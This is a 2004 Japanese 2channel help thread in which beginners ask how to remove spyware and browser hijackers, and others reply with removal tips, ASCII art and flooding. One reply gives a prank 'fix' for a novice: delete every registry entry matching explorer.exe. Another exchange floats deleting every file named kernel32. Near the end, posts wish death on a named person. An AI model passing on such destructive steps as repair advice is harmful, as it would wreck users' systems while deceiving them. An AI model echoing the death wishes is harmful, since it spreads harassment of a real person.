_____ /。 \ / \ / ┏━━━━━┓ | ┃ ● |● | | ┃ | \__/| | \┃ \___ / | え? \ /
素直にテンプレやれ
905 :
ひよこ名無しさん :04/12/08 01:13:20 ID:zx5TIYmb
>>904 おいら(ウィンドウズ98使用)もクールウェブなんとかで地獄をくぐってきたけど、
被害対策手順
http://www.higaitaisaku.com/menu1.html の通りにやってもHPを元に戻せなかったよ。
スパイボットとかをいくらやったところで、HPが戻らなければ、どんどん新たに
スパイウェアを植えつけられて同じことに繰り返しになるだけ。
もちろん、HPを戻したら、テンプレに書いてあることもやって残敵を掃討しなくちゃ
いけないけど。
スパイウェア除去ウィザードで特に役に立ったと思ったのは、
ANTIDOTE for PC AntiVirus SuperLite
検出能力が非常に高いと思った。
>>905 すげえや!!!!!次スレからテンプレを差し替えましょう!!!!!!!!
∧_∧
((´∀` /^)
>>771 さん
/⌒ ノ
γ (,_,丿ソ′
i,_,ノ |||
バンザイ バンザイ ヤッター アリガトー
∧_∧ ∧_∧ ∧_∧ ∧_∧
(^(,, ´∀`)) ・∀・)(ヽ )')((・∀・ /')
ヽ /ヽ ノ ヽ ノ ノ ノ
ノ r ヽ / | / O | ( -、 ヽ
(_,ハ_,),_,/´i,_,ノ (,_,/´i,_,ノ し' ヽ,_,)
なんだコレw
たしかにここのテンプレあんまり 役に立たなかったなぁ 最近のSpyは結構手強いの多いし
771さんの方法をテンプレにしよう〜
>そこで、感染した日付に作成されたファイルをスタートバーのところで検索する。 これで分かる人いるか?
∧_∧
((´∀` /^)
>>771 さん
/⌒ ノ
γ (,_,丿ソ′
i,_,ノ |||
バンザイ バンザイ ヤッター アリガトー
∧_∧ ∧_∧ ∧_∧ ∧_∧
(^(,, ´∀`)) ・∀・)(ヽ )')((・∀・ /')
ヽ /ヽ ノ ヽ ノ ノ ノ
ノ r ヽ / | / O | ( -、 ヽ
(_,ハ_,),_,/´i,_,ノ (,_,/´i,_,ノ し' ヽ,_,)
最終結論的には、バカにつける薬はない。 素っ裸で歩いて風邪引いてるようなもんだからなあ。
凄腕回答者771がいるから安心。
917 :
ひよこ名無しさん :04/12/08 12:50:41 ID:SQhMTjFK
XPです。 IEに「HOT SPOTS」というリンクが表示されました。 SPYBOTとAd-Awareで問題箇所を消してもすぐに問題箇所が復活してくるのですが どうしたらよいでしょうか? 今はIEは正常に機能しています。
感染した日付が分からない場合は???
920 :
917 :04/12/08 12:55:33 ID:SQhMTjFK
>>919 HPの設定は以前のままで正常なんです。
i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!| |i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!| i||┗┓┏┓┃||i┏━━━━┓┗━┛ ┃┃|i||!i┃┃i!| |i |!|i┃┃┃┃i||┗━━━━┛|i|| || ||||!┃┃i|i| i┗┛!i| i||i ||┃┃┃┃|! |||i ||i !|||!|┏━━┛┃|i||!i┏┓i|! |i!i |!┗┛┗┛i|!i| / | / | ┗━━━┛i|i| i┗┛i!| i| |||i|!i| ||!|i||i! /,_ ┴─/ ヽ |!i| ||| |i||!|i|i|||| ||i |i|| ||i!i|| (_゜.,》.'(_゜,》)ミ ヽ ! | |!i||!|ii||!|ii| i|ii / ,,__,ニ、、 ノ( | i|i!|i| |i | Y~~/~y} `, ~ | そ、そんなー… |i !. | ,k.,.,!,.,.,r| ,! く .! i / <ニニニ'ノ \ l
>>920 感染した日付に作成されたファイルをスタートバーのところで検索する。
その日に自分の明確な意志でダウンロードしたファイルがないようなら、それが
スパイウェア。念のため、出てきたファイル名をgoogleなんかで検索してみる。
もしスパイウェアならすぐに判明する。
断定できたら、すぐにゴミ箱へ。削除できなければセーフモードで削除。
他にも色々あるけど、あとは気長にやっていけばいい。
∧_∧
((´∀` /^)
>>771 さん
/⌒ ノ
γ (,_,丿ソ′
i,_,ノ |||
バンザイ バンザイ ヤッター アリガトー
∧_∧ ∧_∧ ∧_∧ ∧_∧
(^(,, ´∀`)) ・∀・)(ヽ )')((・∀・ /')
ヽ /ヽ ノ ヽ ノ ノ ノ
ノ r ヽ / | / O | ( -、 ヽ
(_,ハ_,),_,/´i,_,ノ (,_,/´i,_,ノ し' ヽ,_,)
924 :
917 :04/12/08 13:04:30 ID:SQhMTjFK
す、すげぇ 奇跡がおきてる・・・
>>771 さんは本物だぜ
∧_∧
((´∀` /^)
>>771 さん
/⌒ ノ
γ (,_,丿ソ′
i,_,ノ |||
バンザイ バンザイ ヤッター アリガトー
∧_∧ ∧_∧ ∧_∧ ∧_∧
(^(,, ´∀`)) ・∀・)(ヽ )')((・∀・ /')
ヽ /ヽ ノ ヽ ノ ノ ノ
ノ r ヽ / | / O | ( -、 ヽ
(_,ハ_,),_,/´i,_,ノ (,_,/´i,_,ノ し' ヽ,_,)
いい加減降ろしてやれよ
そのままどこかに捨ててくるほうがいい
みんな必死だな
930 :
ひよこ名無しさん :04/12/08 17:28:21 ID:vVlkW0xz
OSはWindowsの98SEなんですが、ネットサーフィンをしている途中に PCの調子が悪くなったので、msconfigというアプリケーションを開いて スタートアップのところを見ると、[kernel32]というのが作成されていました。 [kernel32]ってなんですか?
インターネットはエロサイトリンクだけで渡ってますのでわかりません
934 :
ひよこ名無しさん :04/12/08 18:05:49 ID:vVlkW0xz
>>931 ググルってなんですか?
>>933 あーありがとうございます!
レッドロフというウィルスなんですね。
[kernel32]だからkernel32というファイルを検索して
見つかったものがあれば全て削除すれば良いのですね。
がんばれ
ここってネタスレだったのか。放置でいいの?
[kernel32]って括弧のつけ方がHijackThisのエントリをコピペしたみたいで、 釣りっぽいんだよなぁ・・・
お前らみたいなのをノリが悪いって言うの
771さん、降臨キボンヌ。
940 :
ひよこ名無しさん :04/12/08 20:43:25 ID:t0kMCcjc
PC超初心者です。助けてください。 【OSの種類】Windows98【ブラウザ】IE version5 まず最初の画面でabout:blankが表示されます。 ネット閲覧中に英語のアダルトサイトが度々でてきました。 スパイウェア対策としてspybot1.3とCWshredderの駆除ソフトを導入 (AD-AWAREはダウンロードできませんでした) 駆除ソフト2つを導入後、いったんはトラブルが解決しました。 しかしOSのシャットダウンができなくなったり、 「メモリが不足しています」「リソースが極端に不足しています」 のメッセージが度々出ているので、これはPCの脆弱性だからと 勘違いし、駆除ソフト上記2つをファイルごと削除したら、 また上記トラブルが発生しました。 再びspybotとCWshredderをダウンロード、インストール しましたが、上記トラブルが一向にやまずPCの起動も ままならない状態で、なにから始めたらいいか混乱しています。 トラブル解決の詳細手順を教えてください。 初心者なのでなるべく分かり易く教えていただけたらと思います。 よろしくおねがいします
>>940 超初心者でも以下の方法を実行すれば問題は解決します
パソコンのトラブル解消法(ME/XPは復元OFFに)
スタートをクリック
↓
ファイルを指名して実行をクリック
↓
regeditと入力してOKをクリック
↓
レジストリエディタが開く
↓
編集をクリックして検索をクリック
↓
explorer.exeと入力して検索をクリック
↓
検索して見つかったものを片っ端から削除
↓
検索が終わったらパソコンを再起動
↓
問題解決
↓
(゚∀゚)ウマー
946 :
940 :04/12/08 21:23:39 ID:t2cOlcJ5
皆様ありがとうございます。 該当PCが調子悪いので別のPCで書きこんでいます。 基本的なことで大変恐縮ですが、 削除、HP変更作業をネット切断しながら する方法を教えてください。
947 :
ひよこ名無しさん :04/12/08 21:32:38 ID:chKsdVh3
再インストールしろ
948 :
940 :04/12/08 21:36:09 ID:DUvXkvos
>>947 再インストールはどうやってやればいいのでしょうか?
ネット切断しながら削除、HP変更作業までは自己解決しました。
そのあと、既存の駆除ソフトはいったん削除してから
また新たにダウンロード、インストールすればいいのですか?
ほんとに基本的なところで申し訳ありません。
>>771 さんの書いてあるとおりに気長にやっていきます。
949 :
教えて。 :04/12/08 22:29:06 ID:wHcuJeMt
エロサイト見てたら、勝手に違うサイト行って 入会しました、ってなりました。無視すればいいとかの事ですが 電話とかやっぱりかかってきちゃうんでしょうか? まだガキなんで親に知られちゃいます。
951 :
教えて。 :04/12/08 23:18:32 ID:wHcuJeMt
電話こわいっす。
>>948 そうだね
一応新たにダウンロード、インストールしたほうが
いいと思うよ。あとスパイウェア除去ソフトを使う時には
セーフモードで実行すると効果的だよ!
954 :
ひよこ名無しさん :04/12/09 01:47:41 ID:zY0uI050
955 :
ひよこ名無しさん :04/12/09 10:26:06 ID:j/lzkEkH
総合スレから誘導されて来ました。 以下そちらの引用です。 295 名前:ひよこ名無しさん 投稿日:04/12/09 09:59:56 ID:j/lzkEkH win98です。 web接続した際にwinadservとwinadslaveが自動実行されるのですが やっぱりこの2つってスパイウェアですか? ググってみましたが日本語のページが無く adawareでも削除できませんでした。 もし詳しい方がおられましたらレスお願い致します。
956 :
ひよこ名無しさん :04/12/09 10:27:00 ID:j/lzkEkH
エロサイトではありませんでしたが どなたかおわかりになりましたらお願いします。
home search assistentってまだ自動で削除してくれるソフト無いの?
>>956 使ってるアンチウィルスソフトとファイアーウォールは何?
960 :
ひよこ名無しさん :04/12/09 11:38:28 ID:a1XOFWk2
>>958 ノートンのv5.0のバンドル版です。最初から入ってるやつです。
火壁は入ってません。
>>959 今Spybot落としてます。
961 :
955 :04/12/09 12:04:19 ID:a1XOFWk2
Spybotでは発見されませんでした。 一旦再起動します。
埋め
965 :
ひよこ名無しさん :04/12/09 17:10:20 ID:Ass3gNsc
インターネットをやろうとeをクリックしたら search for・・・と出ました。 インターネットオプションのホームページアドレスをヤフーにしても出てくるんです。 about:blankとインターネットのホームページアドレスがなっていて固定されてるみたいなんです。 どうすればいいですか?
967 :
955 :04/12/09 18:09:22 ID:7qnsJypY
Giant AntiSpywareで削除できました。 どうもありがとうございました。 ちょっとスパイウェアを舐めてました。
うそつけ
最近いつのまにか同じポップアップの広告が定期的に出てくるんですが・・・。 スパイウェア除去ソフトで消しても無駄でしたorz
970 :
969 :04/12/09 21:26:21 ID:???
or2=3
>>965 最近それ多いね〜!
そいつはスパイ除去ソフトだけじゃ解決しないかも!?
究極の除去ソフトHijackThisを使ってみて!
972 :
ひよこ名無しさん :04/12/10 01:20:03 ID:u63HoiFC
URL見てなかったらcrash me……orz
975 :
ひよこ名無しさん :04/12/10 06:54:46 ID:P1/AQDvf
IEでケーブルには異常ない(確認ずみ)なのに どこのサイト開いても表示できなくなりました これはウィルスやスパイウェアだと思うのですが、 hijackthisやSpotbotなどでは異常が検出できないのです こういう検知ソフトでもかからないのに、こういった症状おこす ウィルスってあるんですか?
976 :
ひよこ名無しさん :04/12/10 08:04:41 ID:wcekI1bz
979 :
975 :04/12/10 08:55:25 ID:W9EMZBsu
回線ぬいてセーフモードでクッキーやIEレジストリの初期化 Web設定のリセットなどはしたのですが、全然です・・・ Hijackthisなどで怪しいソフトどころか、無害なものまで調べて ゴミ箱などに捨てたのですが・・・ IEの動作が重くなるといった症状ならわかるのですが、 IEでどこのサイトにも繋がらない、というのは初めてです。 こういう症例がどういうことが原因か、さえもまずわかりません・・・
>>979 pingも飛ばないか?
ローカルのhtmlファイルを見ようとしたらどうなる?
単純にルータの電源抜き差ししたら直ったりして(笑)
981 :
ひよこ名無しさん :04/12/10 09:50:15 ID:pnVHi65s
おれもそれ心当たりあるが システムの復元で直ったよ。
>>979 接続確認してみそ
自動IPアドレス
IP アドレス 169.254.×.×
サブネットマスク 255.255.0.0
になってないかい?
XPでこの症状であれば治す手だてはあるにはあるが。
984 :
975 979 :04/12/10 10:32:40 ID:26D6bst5
どうも沢山のレスありがとうございます 生憎いま職場からなので、家に帰ったてからいじらないと Ping値や接続先など今の段階ではいえないんですよね・・・ ちなみにOSはWin 2000です。 帰宅して、色々といじってから再度書き込みますね。 失礼しました。
985 :
ひよこ名無しさん :04/12/10 15:39:46 ID:Xx2rfhjN
>>975 だまされて
>>942 の指示に従ったり、IE関係のファイルを間違って削除したり
したんじゃないか?
マイクロソフトのHPでIEをUpdateしてみたら?
986 :
ひよこ名無しさん :04/12/10 15:52:20 ID:PnwijRzI
エロサイトを削除しても画面に出てきます。 どうしたらいいですか?
988 :
ひよこ名無しさん :04/12/10 17:13:18 ID:PnwijRzI
989 :
ひよこ名無しさん :04/12/10 17:15:06 ID:PnwijRzI
tips://start/ ここで感染しました。 助けて下さい・・・。
990 :
ひよこ名無しさん :04/12/10 17:28:24 ID:PnwijRzI
tibs://start/でした。
埋め
992 :
ひよこ名無しさん :04/12/10 17:46:56 ID:KOeba6dA
993 :
ひよこ名無しさん :04/12/10 22:05:06 ID:82dT/jxT
基地害荒らし&ネットストーカー天馬はるかはとっとと死にさらせ!!!
基地害荒らし&ネットストーカー天馬はるかはとっとと死にさらせ!!!
今、天馬はるかが死んだ。
〃/ニ(ノ/ /⌒ヾ〃⌒ヾヽヽ {//〃〃/〃〃ヾヽヾヾ } ハ 〃 / / ソ/ lヽ \ } ノ ) / { シリノ ノノ } l ||/ } } l ノ| /| /ニニノ´ ノーリノ /} / l ( ルハ`ー' リ/ / ノ ν ハリノl| ////., ⌒ノノ ノノ _ ハヽ、 〜 、_ノリソ _−´ ヽ ヽ、ィイ ノ ~ ヽ、 / ー_ ~ } ( 〃 〈 l | Y l l l | 。 ) l | ハ ・ 丶、 ..| ′ l ヽ、 ノ | .l | l / j | |l / / l l l / / l j_ | / /、 ――― ̄ ̄ ̄ ̄ ̄l l/ / / \ー――――――___ /_ノ 、 / Y \ ー―─── ̄ ̄ ̄ / l / ~ ̄ ̄――__ \| V ー‐_ l ∧ 、,J ー‐ l l;〉/J し (/ へー______/ ̄\ーー⌒ー――ーへーへ/\ー_ /  ̄ ̄ ̄ ⊂_ __⊃ \  ̄ー―_ / ⊂_⊃ へ \ \ / / / \ \
/'"´:|~`'''"´ υ `''ー‐`-、'''i---‐‐‐‐'i'''、' ', `ヽ、ノー--‐ '''"~~~^''ー、,,,,、`´、,,,_ :: '"-`''ー'、 ______,,,,,,,,,、ー'"~~~^`'''''ー‐‐‐'''''''''''''ー‐--、,,,_ `''ー、 、i:::i、;ヽ '''''"~^~^~`ヽ、,_  ̄`''ー、,_ ___,,,,,,,,,,_ `''ー、,,,_ 、ーヽノ`" ヽ、 ー-、`'ー、,,_、 ー'" `''ー、  ̄`''ー-、ヽ, ヽ ;  ̄~~~`'ヽ,:、 _、-‐‐ヽ,,,_ `;、_ ~^ヽ、 i, i :::::、、 i‐`'''" ::;i `ヽ、 _,,、---‐‐''""'ー--- ヽ.i ` '':::::::i .i/ ,, :i , ヽ,,/"~´‐‐-- i:i i: i' ' ノ :" i"/:::......... :: i:i .i:i , ;"/|;:/';: //"'´ /" .i::i ノi:i ./''‐' 'ー'、::.i // / /" // _、-"//,./、,_ /~ヽ.i,///" / '" // _,、‐" //`i i/"i i i'i.//'i / ,ノ _、-"‐"/_// /`'i..ノ/ ヽi/ i / i / _,/~/ //'/ /'''i`i / i''ヽi i' i' -、,,,,,__,,,,、-‐"´ _、-''",、‐",、‐''/'"_、-‐-、::i" i '、;, i' i  ̄`'''ー‐-、--‐'''"´‐''"´,-'/'/´ `i, i ;:、 i :i  ̄`''ー---‐‐''" i i' ヽ、 i : '、 i: i  ̄ ̄`''`i''''ー‐‐、‐''' i' `'iヽ、,,_ i i / ヽ、 ヽ、,,_'、 i: :'、 i'" `'ー--- '' / 、‐''`''''ー" ` `、 `'ー-、,,,,,____ヽ__ /~~`'、 /_,,/" i  ̄  ̄`'' /" ` i"i"~ i i",, '/::
イノ // ///〃! i゙i、`、ヽ、_ ノ }、 ノ ゝ j 》 // / / / / ,' | | | ', i ヽ `ーく ヽ / / . // ./. ,' ,' / ,'| | .l l | i l iノ八i i / / 〃| | ! | / ム_〆 l l`-!、 _jj .| !り| ト_,..-ー- 、-ー …ー- 、 / . l | |ィ'i´ハ| | .i、iゝリ__jハ l | | 丿 _ _ ,.ヽー'´ / ゞi、 トル ,=,=、 ゞルハイ_ノミ从i ! i,く _,.、‐'´ _/ ゞレWfバ;;;;;lj {i。:::ij ,' ,' ,イ ヽ `ー''フ /i . |.| |', ゞ- '´ `ー''っ' ./ /j `、 /.,イ , / l !| l,ヽ. """ ,,'__ "/ /イノ i /.ノノ.ノi j' | ゙i. ト、 ゝ、 ノ_/ ,' | r'_,、‐'´イ_r ''´ | ゞi ヽミ `、ー ´ 彡 ! .l ノ¨´.| | ゙ ` ヽ \ ,! レ/ ! | `、 ヽ 八 ,i ,l / l l ヽ `、.. ノ / ゝ,! j /| l、 l
,. ‐-.、,.‐'´ `‐、 / / / //|. ト ヽ ヽ , ' , ' .,イ _∠!/ | ! ヽ !ヽ. ヽ ヽ __ / /// イ/ / | ̄ヽトヽ. ! / ヽ / ' ,イ /,ィャ、 ‐ュ 、 ヽ i l ヽ / /|/l ! {,,il| {,,,,ill|ヽ ヽ|-、/l │ ,' / ,' ゞリ ゞッ ,イj } i. │ . ! ,.‐'´ l '" 丶___ ''''' ,_ヒノ i │ . i, ‐'´ ,、、、‐ 、ヽ、. |' | /'´ノ/⌒ゝ‐、 | ,、(、‐、 )、__) `''‐ヽ._,ノ,、‐'i / /´ _,、、 ' ヽ | (、-‐-、)' \ ,i `;" ~ /`>,ノ、ノ ,、 i ヽ! {,,、‐-、 )\\~''''''‐--`―'‐'' ,´/ ,、‐';ー( , ヾ、ヽ {__,,、‐' | i ヽ`、`ー‐--,,、-=='-‐‐‐<_r''' |、`t' ノ|っヾ、 `ー/ | `、 {''''。''~::: :: 。 ::| ノヽ i_,',r'ミ. | / i 人 ...ノ 丶.. ..ノ :i i | i. | ヽヽ | / ! / ,i :i i |iヽ| / i iノ ,' / :i ' | |ヽ|; / i ー''´ :,' / i ! | | |ヽ' i / / ’ } i | |\ | ./ i i ./ i i ヽ | / i' 、 :: , 'i / | :| \ /| / i ヽ_j_ノ |' / i \ / ノ / i: | ::| |:: l / |ヽ } / / / i. | ::|. |:: | ノ | ヽ /
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。